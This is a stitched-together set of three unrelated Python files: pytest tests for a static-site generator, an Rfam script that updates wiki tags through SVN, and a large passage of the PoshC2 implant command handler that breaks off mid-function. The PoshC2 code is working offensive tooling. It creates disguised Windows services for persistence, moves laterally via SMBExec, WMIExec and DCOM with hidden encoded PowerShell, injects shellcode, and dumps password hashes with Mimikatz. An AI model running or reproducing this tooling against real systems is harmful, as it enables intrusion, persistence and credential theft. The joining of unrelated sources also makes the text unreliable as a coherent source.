def test_process_settings():
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project', 'settings.py'
)
assert tasks.AdminTask.process_settings() == {'root_dir': 'test', 'other_setting': 'test test'}
def test_update_new_setting():
settings_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project', 'settings.py'
)
os.environ['ZORN_SETTINGS_PATH'] = settings_file_path
with open(settings_file_path, 'r') as f:
original_settings = f.read()
task = tasks.AdminTask(verbosity=1, update=True)
task.update_settings('test_setting', "'a test value'")
with open(settings_file_path, 'r') as f:
modified_settings = f.read()
with open(settings_file_path, 'w+') as f:
f.write(original_settings)
assert "TEST_SETTING = 'a test value'" in modified_settings
def test_update_existing_setting():
settings_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project', 'settings.py'
)
os.environ['ZORN_SETTINGS_PATH'] = settings_file_path
with open(settings_file_path, 'r') as f:
original_settings = f.read()
task = tasks.AdminTask(verbosity=1, update=True)
task.update_settings('project_name', "'a whole new project name'")
with open(settings_file_path, 'r') as f:
modified_settings = f.read()
with open(settings_file_path, 'w+') as f:
f.write(original_settings)
print(modified_settings)
assert "PROJECT_NAME = 'a whole new project name'" in modified_settings
assert "PROJECT_NAME = 'example_project'" not in modified_settings
def test_raise_error_if_no_zorn_setting_path():
del os.environ['ZORN_SETTINGS_PATH']
with pytest.raises(errors.NotAZornProjectError):
tasks.AdminTask.process_settings()
def test_raise_error_if_no_root_dir_setting():
os.environ.setdefault(
'ZORN_SETTINGS_PATH',
os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project', 'wrong_settings.py')
)
with pytest.raises(errors.SettingNotFoundError):
tasks.AdminTask.process_settings()
def test_create_with_defaults():
create_task = tasks.Create()
assert create_task.project_name is None
assert create_task.site_title is None
assert create_task.author is None
assert create_task.style is None
assert create_task.generate is False
assert create_task.cwd == os.getcwd()
assert create_task.root_dir is None
def test_create_with_no_defaults():
create_task = tasks.Create(
project_name='test_project_name',
site_title='test_site_title',
author='Mrs. Test',
style='basic',
generate=True,
verbosity=0,
)
assert create_task.project_name == 'test_project_name'
assert create_task.site_title == 'test_site_title'
assert create_task.author == 'Mrs. Test'
assert create_task.style == 'basic'
assert create_task.generate is True
def test_create_raise_error_if_style_is_not_recognized():
with pytest.raises(errors.UnknownStyleError):
tasks.Create(style='blah')
def test_create_and_run_no_defaults():
create_task = tasks.Create(
project_name='test_project_name',
site_title='test_site_title',
author='Mrs. Test',
style='basic',
verbosity=0,
)
create_task.run()
project_path = os.path.join(os.getcwd(), 'test_project_name')
assert os.path.exists(project_path)
assert os.path.exists(os.path.join(project_path, 'admin.py'))
assert os.path.exists(os.path.join(project_path, 'settings.py'))
assert os.path.exists(os.path.join(project_path, 'gulpfile.js'))
assert os.path.exists(os.path.join(project_path, 'package.json'))
assert os.path.exists(os.path.join(project_path, 'md', 'index.md'))
assert os.path.exists(os.path.join(project_path, 'scss', 'main.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_settings.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_nav.scss'))
shutil.rmtree(project_path)
def test_create_and_run_only_project_name():
create_task = tasks.Create(
project_name='test_project_name',
verbosity=0,
)
create_task.run()
project_path = os.path.join(os.getcwd(), 'test_project_name')
assert os.path.exists(project_path)
assert os.path.exists(os.path.join(project_path, 'admin.py'))
assert os.path.exists(os.path.join(project_path, 'settings.py'))
assert os.path.exists(os.path.join(project_path, 'gulpfile.js'))
assert os.path.exists(os.path.join(project_path, 'package.json'))
assert os.path.exists(os.path.join(project_path, 'md', 'index.md'))
assert os.path.exists(os.path.join(project_path, 'scss', 'main.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_settings.scss'))
assert os.path.exists(os.path.join(project_path, 'scss', '_nav.scss'))
shutil.rmtree(project_path)
def test_generate():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project')
assert not os.path.exists(os.path.join(example_project_path, 'index.html'))
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'settings.py')
tasks.Generate().run()
assert os.path.exists(os.path.join(example_project_path, 'index.html'))
os.remove(os.path.join(example_project_path, 'index.html'))
def test_generate_with_wrong_settings():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project')
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'wrong_settings.py')
with pytest.raises(errors.SettingNotFoundError):
tasks.Generate().run()
def test_import_templates():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project')
assert not os.path.exists(os.path.join(example_project_path, 'templates'))
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'settings.py')
tasks.ImportTemplates().run()
assert os.path.exists(os.path.join(example_project_path, 'templates'))
shutil.rmtree(os.path.join(example_project_path, 'templates'))
def test_import_style():
example_project_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'example_project')
assert not os.path.exists(os.path.join(example_project_path, 'soprano'))
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(example_project_path, 'settings.py')
import_task = tasks.ImportStyle(task_args=['soprano'])
assert import_task.style == 'soprano'
import_task.run()
assert os.path.exists(os.path.join(example_project_path, 'soprano'))
shutil.rmtree(os.path.join(example_project_path, 'soprano'))
def test_import_wrong_style():
with pytest.raises(errors.UnknownStyleError):
tasks.ImportStyle(task_args=['basics'])
|
|
"""
Copyright [2009-2017] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# ---------------------------------IMPORTS-------------------------------------
import os
import sys
import subprocess
import logging
# -----------------------------------------------------------------------------
def wiki_redirects_parser(redirects):
"""
Parses wiki redirects and reports rfam accessions and changes to WK tags
Returns a dictionary with changes per family accession
redirects: redirects.txt file from wiki
"""
wk_edits = {}
fp = open(redirects, 'r')
rfam_lines = [x.strip() for x in fp if x.find('Rfam') != -1]
fp.close()
c = '"'
for line in rfam_lines:
rfam_acc = line[len(line) - 7:len(line)]
positions = [pos for pos, char in enumerate(line) if char == c]
old_str = line[positions[0] + 1:positions[1]]
new_str = line[positions[2] + 1:positions[3]]
wk_edits[rfam_acc] = (old_str, new_str)
# return a dictionary with the new redirects per family
return wk_edits
# -----------------------------------------------------------------------------
def update_desc_file(desc_file, tag, updates):
"""
Function to update changes in desc files automatically
desc_file: Path to a desc file
tag: A valid DESC file tag to be modified e.g. 'WK'
updates: A tuple with the desc changes (old, new)
"""
family_dir = os.path.split(desc_file)[0]
new_desc_path = os.path.join(family_dir, "DESC_NEW")
fp = open(desc_file, 'r')
new_desc = open(new_desc_path, 'w')
desc_lines = fp.readlines()
fp.close()
for line in desc_lines:
if line.find(tag) != -1:
line = line.replace('_', ' ')
line = line.replace(updates[0], updates[1].replace(' ', '_'))
new_desc.write(line)
new_desc.close()
# remove old desc and rename new one to DESC
os.remove(desc_file)
os.rename(new_desc_path, os.path.join(family_dir, "DESC"))
# -----------------------------------------------------------------------------
def checkout_family_from_svn(rfam_acc, dest_dir):
"""
Checks out a family from the svn by calling rfco
rfam_acc: A valid Rfam family accession
dest_dir: Destination directory where to check out family
"""
os.chdir(dest_dir)
cmd = "rfco %s" % (rfam_acc)
subprocess.call(cmd, shell=True)
if not os.path.exists(os.path.join(dest_dir, rfam_acc)):
return -1
return 0
# -----------------------------------------------------------------------------
def check_family_into_svn(dest_dir, onlydesc=None):
"""
Check family back to SVN repo using rfci
:param dest_dir:
:return: void
"""
os.chdir(dest_dir)
# list all family directories
family_dirs = [x for x in os.listdir(dest_dir) if x.find('RF') != -1]
for family in family_dirs:
if onlydesc is None:
cmd = "rfci -m /'Updated WK in DESC/' %s" % family
else:
cmd = "rfci -onlydesc -m /'Updated WK in DESC/' %s" % family
subprocess.call(cmd, shell=True)
# -----------------------------------------------------------------------------
def create_wiki_markdown_links(dest_dir):
"""
Create a list of Rfam accessions and links in markdown
dest_dir: The check out directory
"""
fp_out = open(os.path.join(dest_dir, "family_links.md"), 'w')
families = [x for x in os.listdir(dest_dir) if os.path.isdir(os.path.join(dest_dir, x))]
for rfam_acc in families:
fam_dir = os.path.join(dest_dir, rfam_acc)
desc_fp = open(os.path.join(fam_dir, "DESC"), 'r')
description = ''
wk_tag = ''
# get tags
for line in desc_fp:
if line[0:2] == 'DE':
description = line[2:].strip()
elif line[0:2] == 'WK':
wk_tag = line[2:].replace(' ', '')
desc_fp.close()
md_str = ''
md_str = '[' + rfam_acc + '-' + description + ']'
md_str = md_str + "(https://en.wikipedia.org/wiki/" + wk_tag + ')'
fp_out.write(md_str + '\n')
fp_out.close()
# -----------------------------------------------------------------------------
def create_rfam_markdown_links(dest_dir):
"""
Create a list of Rfam accessions and links in markdown
dest_dir: The check out directory
"""
fp_out = open(os.path.join(dest_dir, "family_links.md"), 'w')
families = [x for x in os.listdir(dest_dir) if os.path.isdir(os.path.join(dest_dir, x))]
for rfam_acc in families:
fam_dir = os.path.join(dest_dir, rfam_acc)
desc_fp = open(os.path.join(fam_dir, "DESC"), 'r')
wk_tag = ''
# get tags
for line in desc_fp:
if line[0:2] == 'WK':
wk_tag = line[2:].replace(' ', '')
desc_fp.close()
fp_out.write('[' + rfam_acc + '-' + wk_tag + ']' + "(http://rfam.xfam.org/family/" + rfam_acc + ")\n\n")
fp_out.close()
# -----------------------------------------------------------------------------
def main(redirects, dest_dir):
"""
This function puts all the pieces together parameters are provided through
command line
redirects: Wiki redirects output file
dest_dir: Family check out directory
"""
# create a log file
logging.basicConfig(filename=os.path.join(dest_dir, 'wk_desc_updates.log'), level=logging.ERROR)
# parse wiki redirects file and changes per rfam_acc in a dictionary
wk_edits = wiki_redirects_parser(redirects)
for rfam_acc in wk_edits.keys():
# check out family from the svn repo
status = checkout_family_from_svn(rfam_acc, dest_dir)
# rfco success
if status == 0:
family_dir = os.path.join(dest_dir, rfam_acc)
update_desc_file(os.path.join(family_dir, "DESC"), "WK", wk_edits[rfam_acc])
else:
logging.error("Failed to checkout family %s" % rfam_acc)
# generate markdown for inspection
create_rfam_markdown_links(dest_dir)
# --------------------------------------------------------------------------------------------------
def commit_family_to_svn(dest_dir):
"""
Commits a list of families to the svn using rfci -onlydesc
dest_dir: A destination directory with all
"""
os.chdir(dest_dir)
# create a log file
logging.basicConfig(filename=os.path.join(dest_dir, 'auto_rfci_errors.log'), level=logging.DEBUG)
family_dirs = [x for x in os.listdir(dest_dir) if os.path.isdir(os.path.join(dest_dir, x))]
rfci_cmd = "rfci -onlydesc -m \'Wiki Updates\' %s"
for family_dir in family_dirs:
cmd = rfci_cmd % family_dir
try:
subprocess.call(cmd, shell=True)
except:
logging.exception("Failed to commit family %s" % family_dir)
# --------------------------------------------------------------------------------------------------
def usage():
# CODE
pass
# --------------------------------------------------------------------------------------------------
if __name__ == '__main__':
redirects_file = sys.argv[1]
dest_dir = sys.argv[2]
main(redirects_file, dest_dir)
# need to wrap this up in an option to just commit or develop an autocommit script
# commit_family_to_svn(dest_dir)
|
|
import base64, re, traceback, os
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import ps_alias
from poshc2.Colours import Colours
from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader, yes_no_prompt
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads
from poshc2.client.Help import posh_help, allhelp
from poshc2.server.Config import PayloadsDirectory, PoshInstallDirectory, PoshProjectDirectory, SocksHost, ModulesDirectory, DomainFrontHeader, PayloadCommsHost
from poshc2.server.Config import PBindSecret, PBindPipeName
from poshc2.server.Core import print_bad, creds, print_good
from poshc2.client.Opsec import ps_opsec
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.database.DB import new_task, select_item, update_label, kill_implant, get_implantdetails, get_c2server_all
from poshc2.server.database.DB import get_newimplanturl, get_allurls, get_sharpurls, new_urldetails, get_powerstatusbyrandomuri
def handle_ps_command(command, user, randomuri, implant_id):
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print_bad("Error loading Stage2-Core.ps1: %s" % e)
# alias mapping
for alias in ps_alias:
if command.startswith(alias[0]):
command.replace(alias[0], alias[1])
command = command.strip()
run_autoloads(command, randomuri, user)
# opsec failures
for opsec in ps_opsec:
if opsec == command[:len(opsec)]:
print_bad("**OPSEC Warning**")
ri = input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
break
if command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("searchallhelp"):
do_searchallhelp(user, command, randomuri)
return
elif command.startswith("download-files "):
do_download_files(user, command, randomuri)
return
elif command.startswith("install-servicelevel-persistence"):
do_install_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("remove-servicelevel-persistence"):
do_remove_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("get-implantworkingdirectory"):
do_get_implantworkingdirectory(user, command, randomuri)
return
elif command.startswith("get-system"):
do_get_system(user, command, randomuri)
return
elif command.startswith("invoke-psexec ") or command.startswith("invoke-smbexec "):
do_invoke_psexec(user, command, randomuri)
return
elif command.startswith("invoke-psexecpayload "):
do_invoke_psexecpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmiexec "):
do_invoke_wmiexec(user, command, randomuri)
return
elif command.startswith("invoke-wmijspbindpayload "):
do_invoke_wmijspbindpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmijspayload "):
do_invoke_wmijspayload(user, command, randomuri)
return
elif command.startswith("invoke-wmipayload "):
do_invoke_wmipayload(user, command, randomuri)
return
elif command.startswith("invoke-dcompayload "):
do_invoke_dcompayload(user, command, randomuri)
return
elif command.startswith("invoke-runaspayload"):
do_invoke_runaspayload(user, command, randomuri)
return
elif command.startswith("invoke-runas "):
do_invoke_runas(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
elif command.startswith("get-pid"):
do_get_pid(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoudleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("pbind-loadmodule"):
do_pbind_loadmodule(user, command, randomuri)
return
elif command.startswith("invoke-daisychain"):
do_invoke_daisychain(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command == "listmodules":
do_listmodules(user, command, randomuri)
return
elif command == "modulesloaded":
do_modulesloaded(user, command, randomuri)
return
elif command == "ps":
do_ps(user, command, randomuri)
return
elif command == "get-screenshotmulti":
do_get_screenshotmulti(user, command, randomuri)
return
elif command == "get-powerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "get-screenshot":
do_get_screenshot(user, command, randomuri)
return
elif command == "hashdump":
do_hashdump(user, command, randomuri)
return
elif command == "loadpowerstatus":
do_loadpowerstatus(user, command, randomuri)
return
elif command == "stopdaisy":
do_stopdaisy(user, command, randomuri)
return
elif command == "stopsocks":
do_stopsocks(user, command, randomuri)
return
elif command == "sharpsocks":
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("get-rotation")):
do_get_rotation(user, command, randomuri)
return
elif command.startswith("reversedns"):
do_reversedns(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command.startswith("sharp") or command.startswith("run-exe") or command.startswith("run-dll"):
do_sharp(user, command, randomuri)
return
else:
if command:
do_shell(user, command, randomuri)
return
def do_searchhistory(user, command, randomuri):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+", ""))
def do_searchhelp(user, command, randomuri):
searchterm = (command).replace("searchhelp ", "")
helpful = posh_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_download_files(user, command, randomuri):
print_bad("Please enter a full path to the directory")
def do_install_servicelevel_persistence(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
def do_remove_servicelevel_persistence(user, commmand, randomuri):
new_task("sc.exe delete CPUpdater", user, randomuri)
def do_get_implantworkingdirectory(user, command, randomuri):
new_task("pwd", user, randomuri)
def do_get_system(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
@creds()
def do_invoke_psexec(user, command, randomuri):
check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
params = re.compile("invoke-smbexec |invoke-psexec ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-smbexec %s" % params
new_task(cmd, user, randomuri)
def do_invoke_smbexec(user, command, randomuri):
return do_invoke_psexec(user, command, randomuri)
@creds()
def do_invoke_psexecpayload(user, command, randomuri):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
print_bad("Need to run createproxypayload first")
return
@creds()
def do_invoke_wmiexec(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
params = re.compile("invoke-wmiexec ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s" % params
new_task(cmd, user, randomuri)
@creds()
def do_invoke_wmijspbindpayload(user, command, randomuri):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
target = re.search("(?<=-target )\\S*", str(cmd), re.IGNORECASE)
C2 = get_c2server_all()
print()
print("To connect to the SMB named pipe use the following command:")
print(f"{Colours.GREEN}invoke-pbind -target {target[0]} -secret {PBindSecret} -key {C2.EncKey} -pname {PBindPipeName} -client{Colours.END}")
print()
print("To issue commands to the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-command \"pwd\"" + Colours.END)
print()
print("To load modules to the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-loadmodule Invoke-Mimikatz.ps1" + Colours.END)
print()
print("To kill the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-kill" + Colours.END)
@creds()
def do_invoke_wmijspayload(user, command, randomuri):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, path), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
else:
print_bad("Need to run createnewpayload first")
return
@creds()
def do_invoke_wmipayload(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
print_bad("Need to run createdaisypayload first")
return
def do_invoke_dcompayload(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
else:
print_bad("Need to run createnewpayload first")
return
@creds(accept_hashes=False)
def do_invoke_runas(user, command, randomuri):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runas ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-runas %s" % params
new_task(cmd, user, randomuri)
@creds(accept_hashes=False)
def do_invoke_runaspayload(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.payload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Payload to use: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bat"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
pscommand = f"invoke-runas {params} -command $proxypayload"
new_task(pscommand, user, randomuri)
else:
print("Need to run createnewpayload first")
return
def do_help(user, command, randomuri):
print(posh_help)
def do_get_pid(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.PID)
def do_upload_file(user, command, randomuri):
source = ""
destination = ""
nothidden = False
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print_bad("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
nothidden = yes_no_prompt("Do not hide the file:")
else:
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
try:
print("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = f"upload-file {source} {destination} -NotHidden ${nothidden}"
else:
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print_bad("Error with source file: %s" % e)
traceback.print_exc()
def do_kill_implant(user, command, randomuri):
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "PS":
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
def do_loadmoudleforce(user, command, randomuri):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_pbind_loadmodule(user, command, randomuri):
params = re.compile("pbind-loadmodule ", re.IGNORECASE)
params = params.sub("", command)
new_task(("pbind-loadmodule %s" % params), user, randomuri)
def do_invoke_daisychain(user, command, randomuri):
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command, urls), user, randomuri)
update_label("DaisyHost", randomuri)
print("Now use createdaisypayload")
def do_inject_shellcode(user, command, randomuri):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
arch = "64"
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print_bad("Error loading file: %s" % e)
def do_listmodules(user, command, randomuri):
modules = os.listdir(ModulesDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if ".ps1" in mod:
print(mod)
def do_modulesloaded(user, command, randomuri):
ml = get_implantdetails(randomuri)
print(ml.ModsLoaded)
def do_ps(user, command, randomuri):
new_task("get-processlist", user, randomuri)
def do_hashdump(user, command, randomuri):
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
def do_stopdaisy(user, command, randomuri):
update_label("", randomuri)
new_task(command, user, randomuri)
def do_stopsocks(user, command, randomuri):
update_label("", randomuri)
new_task(command, user, randomuri)
def do_sharpsocks(user, command, randomuri):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
